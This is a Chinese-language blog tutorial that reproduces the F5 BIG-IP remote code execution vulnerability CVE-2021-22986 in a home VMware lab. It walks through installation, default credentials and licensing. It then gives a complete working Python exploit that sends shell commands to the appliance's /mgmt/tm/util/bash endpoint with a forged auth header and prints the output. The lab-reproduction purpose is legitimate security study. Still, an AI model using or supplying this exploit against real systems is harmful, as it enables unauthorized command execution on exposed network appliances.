F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986 虚拟机上复现

一、在vmware上安装BIGIP-15.1.0

进入F5官方主页:https://support.f5.com/csp/home
点击下载按钮(如下图所示)
在这里插入图片描述
进入页面后,我们选择v15.X版本
在这里插入图片描述
选择15.1.0长期维护版本
在这里插入图片描述
在这里,我们选择虚拟化版本
在这里插入图片描述
点击我接受按钮
在这里插入图片描述
选择第一个下载
在这里插入图片描述
下载完成之后,我们将下载下来的ova文件拖动到虚拟机当中,即可完成虚拟机的安装
在这里插入图片描述

二、BIGIP虚拟机的初始使用

虚拟机登陆
虚拟机装好后 默认的用户名是 root,密码是default.
个别用户登陆后,会强制要求更换密码。这里更换的密码不能是一些常用的字符组合(比如单词)否则很容易不通过。如果您失败了几次,不妨尝试类似于f8fa7g4k3k69o这样的密码。
远程web登陆
虚拟机root登陆成功后,通过ifconfig命令获取ip地址(虚拟机要桥接模式哦),假设这里获取的ip为10.0.0.166, 那么在host主机访问这个网址,进入web配置页面
在这里插入图片描述
在这里插入图片描述
web远程登陆的用户名和密码都是admin,但是我在登陆的时候密码始终不对,最后,我只好重置这个密码(如下图,输入两遍新密码)
在这里插入图片描述
终于,在重置密码后,我web远程登陆成功了

license激活
接下来,我们点击license按钮(我这里是激活过的)
在这里插入图片描述
如果不是已激活的状态,需要进入官网:(http://www.f5.com/trial)来获取激活码
流程如图所示,选择红色框框选中的按钮
在这里插入图片描述
点击Get started按钮
在这里插入图片描述
填写你的申请信息(官网要登陆哦)
在这里插入图片描述
稍后,会在半个小时内,将激活码发送到您的邮箱里面(邮箱是官网账号注册时留的邮箱)
我们收到激活码后填写到下面的Base Registration Key栏中,然后选择Automatic模式进行激活(因为本人激活过了,所以下图是在网上找的,网上的那个人选择的是第二个,这里我实际操作选择的是第一个)
在这里插入图片描述
然后点击Next按钮,如果出现下一步或者我接受之类的按钮一律点击即可
之后一般会自动跳转到如下图所示的界面,这就代表激活成功了
在这里插入图片描述

三、远程代码执行命令

执行代码

import requests
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def attack(target_url, command="pwd"):
    command = f"\'{command}\'"
    check_url = target_url + '/mgmt/tm/util/bash'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'X-F5-Auth-Token': '',
        'Authorization': 'Basic YWRtaW46QVNhc1M='
    }
    data = {'command': "run",'utilCmdArgs':f"-c {command}"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print(" {} 存在漏洞".format(target_url))
            attack_result = json.loads(response.text.replace('\\n', '\\t')).get('commandResult', None)
            return attack_result
        else:
            print("{} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {}'.format(target_url))


def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {}'.format(url))



if __name__ == '__main__':
    # 你的虚拟机ip地址
    ip = "your ip"
    # 执行的命令
    command = "ls"
    url = format_url(ip)
    # 输出返回结果
    print(attack(url, command))
上面的代码用户使用的时候,只需要将ip 改成您虚拟机的ip即可,其余无需改变

执行结果展示

  1. 查看当前路径
    在这里插入图片描述
  2. 查看当前路径下的文件
    在这里插入图片描述
    3.创建一个目录
    在这里插入图片描述
    到虚拟机中,我们查看目录是否创建成功

在这里插入图片描述
可以看到目录创建成功

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值